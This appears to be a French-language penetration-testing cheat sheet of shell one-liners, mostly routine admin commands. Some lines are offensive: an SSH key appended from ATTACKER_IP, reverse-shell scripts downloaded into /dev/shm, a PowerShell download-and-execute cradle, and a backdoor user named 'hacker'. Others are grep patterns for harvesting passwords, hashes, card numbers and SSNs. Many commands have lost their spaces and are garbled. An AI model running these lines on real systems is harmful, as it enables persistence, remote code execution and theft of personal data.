Utilisez Trickest pour construire et automatiser facilement des flux de travail alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :
#Exfiltration using Base64base64-w0file#Get HexDump without new linesxxd-pboot12.bin|tr-d'\n'#Add public key to authorized keyscurlhttps://ATTACKER_IP/.ssh/id_rsa.pub>>~/.ssh/authorized_keys#Echo without new line and Hexecho-n-e#Countwc-l<file>#Lineswc-c#Chars#Sortsort-nr#Sort by number and then reversecatfile|sort|uniq#Sort and delete duplicates#Replace in filesed-i's/OLD/NEW/g'path/file#Replace string inside a file#Download in RAMwget10.10.14.14:8000/tcp_pty_backconnect.py-O/dev/shm/.rev.pywget10.10.14.14:8000/tcp_pty_backconnect.py-P/dev/shmcurl10.10.14.14:8000/shell.py-o/dev/shm/shell.py#Files used by network processeslsof#Open files belonging to any processlsof-p3#Open files used by the processlsof-i#Files used by networks processeslsof-i4#Files used by network IPv4 processeslsof-i6#Files used by network IPv6 processeslsof-i4-a-p1234#List all open IPV4 network files in use by the process 1234lsof+D/lib#Processes using files inside the indicated dirlsof-i:80#Files uses by networks processesfuser-nvtcp80#Decompresstar-xvzf/path/to/yourfile.tgztar-xvjf/path/to/yourfile.tbzbzip2-d/path/to/yourfile.bz2tarjxffile.tar.bz2gunzip/path/to/yourfile.gzunzipfile.zip7z-xfile.7zsudoapt-getinstallxz-utils; unxzfile.xz#Add new useruseradd-p'openssl passwd -1 <Password>'hacker#Clipboardxclip-selc<catfile.txt#HTTP serverspython-mSimpleHTTPServer80python3-mhttp.serverruby-rwebrick-e"WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"php-S $ip:80#Curl#json datacurl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWTcurl-XGET-H'Authorization: Bearer <JWT>'http://host:3000/endpoint#Send EmailsendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytesddif=file.binbs=28skip=1of=blob#Mount .vhd files (virtual hard drive)sudoapt-getinstalllibguestfs-toolsguestmount--addNAME.vhd--inspector--ro/mnt/vhd#For read-only, create first /mnt/vhd# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keysssh-keyscan10.10.10.101# Opensslopenssls_client-connect10.10.10.127:443#Get the certificate from a serveropensslx509-inca.cert.pem-text#Read certificateopensslgenrsa-outnewuser.key2048#Create new RSA2048 keyopenssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Create certificateopenssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:opensslpkcs12-export-inca.cert.pem-inkeyca.key.pem-outclient.p12# Decrypt ssh keyopensslrsa-inkey.ssh.enc-outkey.ssh#Decryptopensslenc-aes256-k<KEY>-d-inbackup.tgz.enc-outb.tgz#Count number of instructions executed by a program, need a host based linux (not working in VM)perfstat-x,-einstructions:u"ls"#Find trick for HTB, find files from 2018-12-12 to 2018-12-14find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezonesudodpkg-reconfiguretzdata#Search from which package is a binaryapt-filesearch/usr/bin/file#Needed: apt-get install apt-file#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.htmlecho"CIKUmMesGw=="|base64-d|protoc--decode_raw#Set not removable bitsudochattr+ifile.txtsudochattr-ifile.txt#Remove the bit so you can delete it# List files inside zip7zlfile.zip
Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :
#Base64 for Windowsecho -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
#Exe compressionupx-9nc.exe#Exe2batwineexe2bat.exenc.exenc.txt#Compile Windows python exploit to exepipinstallpyinstallerwget-Oexploit.pyhttp://www.exploit-db.com/download/31853pythonpyinstaller.py--onefileexploit.py#Compile for windows#sudo apt-get install gcc-mingw-w64-i686i686-mingw32msvc-gcc-oexecutableuseradd.c
Greps
Les commandes grep et egrep sont utilisées pour rechercher du texte dans des fichiers. grep est sensible à la casse, tandis que egrep permet d'utiliser des expressions régulières étendues.
#Extract emails from filegrep-E-o"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"file.txt#Extract valid IP addressesgrep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt
#Extract passwordsgrep-i"pwd\|passw"file.txt#Extract usersgrep-i"user\|invalid\|authentication\|login"file.txt# Extract hashes#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})egrep-oE'(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)'*.txt|egrep-o'[a-fA-F0-9]{32}'>md5-hashes.txt#Extract valid MySQL-Old hashesgrep-e"[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}"*.txt>mysql-old-hashes.txt#Extract blowfish hashesgrep-e"$2a\$\08\$(.){75}"*.txt>blowfish-hashes.txt#Extract Joomla hashesegrep-o"([0-9a-zA-Z]{32}):(w{16,32})"*.txt>joomla.txt#Extract VBulletin hashesegrep-o"([0-9a-zA-Z]{32}):(S{3,32})"*.txt>vbulletin.txt#Extraxt phpBB3-MD5egrep-o'$H$S{31}'*.txt>phpBB3-md5.txt#Extract Wordpress-MD5egrep-o'$P$S{31}'*.txt>wordpress-md5.txt#Extract Drupal 7egrep-o'$S$S{52}'*.txt>drupal-7.txt#Extract old Unix-md5egrep-o'$1$w{8}S{22}'*.txt>md5-unix-old.txt#Extract md5-apr1egrep-o'$apr1$w{8}S{22}'*.txt>md5-apr1.txt#Extract sha512crypt, SHA512(Unix)egrep-o'$6$w{8}S{86}'*.txt>sha512crypt.txt#Extract e-mails from text filesgrep-E-o"\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b"*.txt>e-mails.txt#Extract HTTP URLs from text filesgrephttp|grep-shoP'http.*?[" >]'*.txt>http-urls.txt#For extracting HTTPS, FTP and other URL format usegrep-E'(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]'*.txt>urls.txt#Note: if grep returns "Binary file (standard input) matches" use the following approaches # tr '[\000-\011\013-\037177-377]' '.' < *.log | grep -E "Your_Regex" OR # cat -v *.log | egrep -o "Your_Regex"
#Extract Floating point numbersgrep-E-o"^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$"*.txt>floats.txt# Extract credit card data#Visagrep-E-o"4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>visa.txt#MasterCardgrep-E-o"5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>mastercard.txt#American Expressgrep-E-o"\b3[47][0-9]{13}\b"*.txt>american-express.txt#Diners Clubgrep-E-o"\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b"*.txt>diners.txt#Discovergrep-E-o"6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}"*.txt>discover.txt#JCBgrep-E-o"\b(?:2131|1800|35d{3})d{11}\b"*.txt>jcb.txt#AMEXgrep-E-o"3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}"*.txt>amex.txt# Extract IDs#Extract Social Security Number (SSN)grep-E-o"[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}"*.txt>ssn.txt#Extract Indiana Driver License Numbergrep-E-o"[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}"*.txt>indiana-dln.txt#Extract US Passport Cardsgrep-E-o"C0[0-9]{7}"*.txt>us-pass-card.txt#Extract US Passport Numbergrep-E-o"[23][0-9]{8}"*.txt>us-pass-num.txt#Extract US Phone Numberssgrep-Po'd{3}[s-_]?d{3}[s-_]?d{4}'*.txt>us-phones.txt#Extract ISBN Numbersegrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
Trouver
# Find SUID set files.find/-perm/u=s-ls2>/dev/null# Find SGID set files.find/-perm/g=s-ls2>/dev/null# Found Readable directory and sort by time. (depth = 4)find / -type d -maxdepth 4 -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Writable directory and sort by time. (depth = 10)find / -type d -maxdepth 10 -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current User and sort by time. (depth = 10)find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current Group ID and Sort by time. (depth = 10)find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Newer files and sort by time. (depth = 5)find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer files only and sort by time. (depth = 5)find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer directory only and sort by time. (depth = 5)find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
Aide à la recherche Nmap
#Nmap scripts ((default or version) and smb))nmap--script-help"(default or version) and *smb*"locate-r'\.nse$'|xargsgrepcategories|grep'default\|version\|safe'|grepsmbnmap--script-help"(default or version) and smb)"
Bash
Commandes utiles
history
Affiche l'historique des commandes précédemment exécutées.
alias
Permet de créer des alias pour des commandes fréquemment utilisées.
chmod
Modifie les permissions d'accès aux fichiers et répertoires.
chown
Change le propriétaire et le groupe d'un fichier ou d'un répertoire.
ps
Affiche les processus en cours d'exécution.
top
Affiche les processus en cours d'exécution et leurs consommations de ressources.
kill
Permet de terminer des processus en cours d'exécution en utilisant leur PID.
df
Affiche l'espace disque utilisé et disponible sur le système de fichiers.
du
Affiche l'espace disque utilisé par les fichiers et répertoires spécifiques.
free
Affiche l'utilisation de la mémoire et de l'espace swap.
grep
Recherche des motifs dans un fichier ou une sortie de commande.
find
Permet de rechercher des fichiers et des répertoires dans l'arborescence du système de fichiers.
tar
Permet de compresser et décompresser des fichiers et des répertoires.
rsync
Permet de synchroniser des fichiers et des répertoires entre différents emplacements.
ssh
Permet de se connecter à un serveur distant de manière sécurisée.
scp
Permet de transférer des fichiers de manière sécurisée entre des machines distantes.
wget
Permet de télécharger des fichiers depuis le Web en ligne de commande.
curl
Permet de transférer des données depuis ou vers un serveur en ligne de commande.
#All bytes inside a file (except 0x20 and 0x00)for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
Iptables
Description
Iptables is a powerful firewall utility for Linux systems. It allows you to configure the packet filtering rules of the Linux kernel firewall, which can be used to secure and harden your system against network attacks.
Useful Commands
List all rules: iptables -L
List all rules with line numbers: iptables -L --line-numbers
Flush all rules: iptables -F
Block a specific IP address: iptables -A INPUT -s <IP_ADDRESS> -j DROP
Allow a specific IP address: iptables -A INPUT -s <IP_ADDRESS> -j ACCEPT
Block a specific port: iptables -A INPUT -p tcp --dport <PORT_NUMBER> -j DROP
Allow a specific port: iptables -A INPUT -p tcp --dport <PORT_NUMBER> -j ACCEPT
Save rules: iptables-save > /etc/iptables/rules.v4
Utilisez Trickest pour construire et automatiser facilement des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui: